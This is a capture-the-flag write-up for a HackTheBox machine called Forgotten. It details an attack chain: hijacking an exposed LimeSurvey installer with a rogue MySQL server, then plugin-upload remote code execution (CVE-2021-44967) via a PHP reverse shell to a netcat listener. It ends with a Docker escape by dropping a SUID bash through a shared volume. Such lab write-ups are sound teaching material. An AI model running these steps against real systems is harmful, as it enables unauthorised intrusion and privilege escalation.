Summary
Forgotten is a HckTheBox machine centered around an exposed LimeSurvey installer endpoint that was never properly secured post-deployment. By spinning up a rogue MySQL server, an attacker can hijack the installation process to create a fresh admin account on the target's LimeSurvey instance. From there, a known RCE vulnerability (CVE-2021-44967) in LimeSurvey's plugin upload feature grants a foothold inside a Docker container. Environment variable leakage exposes the container user's password, allowing lateral movement to the host OS via SSH. Finally, a mounted Docker volume shared between the container and the host enables a classic SUID bash privilege escalation to achieve root on the underlying system.
Reconnaissance
Port Scan
nmap -sC -sV -A <MACHINE-IP> -oA nmap
Open ports:
| Port | Service | Version |
|---|---|---|
| 22 | SSH | OpenSSH 8.9p1 (Ubuntu) |
| 80 | HTTP | Apache 2.4.56 (Debian) |
The HTTP root returns a 403 Forbidden. The Server header leaks Apache/2.4.56 (Debian) and the nmap host info reveals the internal Docker IP 172.17.0.2, hinting at a containerized web application.
Directory Enumeration
ffuf -u http://forgotten.vl/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
Key finding:
survey [Status: 301]
Browsing to http://forgotten.vl/survey reveals a LimeSurvey application.
Initial Access
Stage 1 - Exploiting the Exposed LimeSurvey Installer
Navigating to http://forgotten.vl/survey/index.php?r=installer/precheck showed that the LimeSurvey installer was still accessible and had not been removed after deployment — a critical misconfiguration.
Pre-installation check (Step 3) leaked the version:
LimeSurvey 6.3.7
A quick search revealed CVE-2021-44967 — an authenticated RCE via plugin upload in LimeSurvey. The catch: admin access is required. The installer gave a path to create our own admin account.
Stage 2 - Rogue MySQL Server
The installer's Step 4 (Database Configuration) asks for a database host. Since we control what host the target application connects to, we stood up our own MySQL server:
docker run -p 3306:3306 --rm --name evil-mysql \
-e MYSQL_ROOT_PASSWORD=pass123 mysql:latest
Verified it was listening:
netstat -tanp | grep -i list
# tcp 0.0.0.0:3306 LISTEN docker-proxy
In the installer form (Step 4 — Configuration), we provided:
| Field | Value |
|---|---|
| Database type | MySQL |
| Database location |
<YOUR-IP>:3306 (our Kali IP) |
| Database user | root |
| Database password | pass123 |
| Database name | test |
| Table prefix | lime_ |
Proceeding to Step 5, the installer reported "Database doesn't exist" and offered to create it — we clicked Create database, which our rogue MySQL accepted. After clicking Populate database, Step 6 (Administrator Settings) appeared, letting us set a known admin password.
Installation completed successfully with our own admin credentials.
Stage 3 - RCE via LimeSurvey Plugin Upload (CVE-2021-44967)
With admin access at http://forgotten.vl/survey/index.php/admin/authentication/sa/login, we exploited the plugin upload functionality.
Crafted a malicious plugin archive:
config.xml:
<?xml version="1.0" encoding="UTF-8"?>
<config>
<metadata>
<name>ExamplePlugin</name>
<type>plugin</type>
<author>exploitnotes</author>
<version>1.0</version>
<description>Example Plugin</description>
</metadata>
<compatibility>
<version>6.3</version>
</compatibility>
</config>
rev-shell.php: A standard PHP reverse shell (pentestmonkey) pointing back to <YOUR-IP>:4444.
zip evil.zip rev-shell.php config.xml
Upload steps:
- Navigate to Configuration → Plugins → Upload & Install
- Upload
evil.zip - Confirm installation
- Start a netcat listener:
nc -lvnp 4444 - Trigger the shell:
curl http://forgotten.vl/survey/upload/plugins/ExamplePlugin/rev-shell.php
Shell received:
limesvc@efaa6f5097ed:/$ whoami
limesvc
limesvc@efaa6f5097ed:/$ id
uid=2000(limesvc) gid=2000(limesvc) groups=2000(limesvc),27(sudo)
Post-Exploitation
Docker Container Confirmation
The presence of /.dockerenv and the hostname efaa6f5097ed, combined with the ifconfig output showing inet 172.17.0.2, confirmed we were inside a Docker container — not the host OS directly.
Credential Discovery via Environment Variables
limesvc@efaa6f5097ed:/$ env
The environment dump revealed:
LIMESURVEY_ADMIN=limesvc
LIMESURVEY_PASS=5W5HN4K4GCXf9E
These credentials were baked into the container at build time.
Sudo Escalation Inside Container
sudo -l
# (using LIMESURVEY_PASS as password)
# User limesvc may run the following commands: (ALL : ALL) ALL
sudo -i
root@efaa6f5097ed:~#
Root inside the container — but still containerized.
Host Escape & Privilege Escalation
Volume Mount Enumeration
Inspecting mounts revealed a bind mount:
/dev/root on /var/www/html/survey type ext4 (rw,relatime...)
The container's /var/www/html/survey directory was mounted read-write from the host at /opt/limesurvey. Crucially, files written inside the container appear on the host with their original permissions — including SUID bits.
SUID Bash Binary Drop
From inside the container (as root):
cp /bin/bash /var/www/html/survey/bash
chmod +s /var/www/html/survey/bash
SSH to Host
The credentials discovered in the container's environment also worked for SSH on the host:
ssh limesvc@forgotten.vl
# Password: 5W5HN4K4GCXf9E
User flag obtained:
limesvc@forgotten:~$ cat user.txt
[REDACTED]
Root via SUID Bash
The SUID bash binary dropped through the shared volume appeared at /opt/limesurvey/bash on the host:
limesvc@forgotten:/opt/limesurvey$ ./bash -p
bash-5.1# whoami
root
bash-5.1# cat /root/root.txt
[REDACTED]
Attack Chain
Exposed LimeSurvey installer (/survey/index.php?r=installer)
│
▼
Rogue MySQL server → hijack DB config step → create admin account
│
▼
Authenticated as admin → CVE-2021-44967 plugin upload RCE
│
▼
Shell as limesvc inside Docker container
│
▼
Environment variables leak LIMESURVEY_PASS
│
▼
sudo -i → root inside container
│
▼
Shared volume (/var/www/html/survey ↔ /opt/limesurvey) → drop SUID bash
│
▼
SSH to host as limesvc → ./bash -p → root on host
Key Vulnerabilities
| # | Vulnerability | Impact |
|---|---|---|
| 1 | Exposed installer endpoint — LimeSurvey installer left accessible in production | Allows full application reinstallation and admin account creation |
| 2 | Rogue database server acceptance — installer trusts any externally provided DB host without validation | Enables attacker to supply and control the database |
| 3 | CVE-2021-44967 — LimeSurvey ≤ 6.3.7 authenticated RCE via plugin upload | Remote code execution as web server user |
| 4 |
Credentials in environment variables — LIMESURVEY_PASS exposed via env inside container |
Password reuse enables SSH access to host |
| 5 | Docker volume shared with host (rw) — container web root bind-mounted to host filesystem | Container escape via SUID binary drop |
| 6 | SUID bash privilege escalation — arbitrary file write as container root → SUID bash on host | Full host root access |
Top comments (0)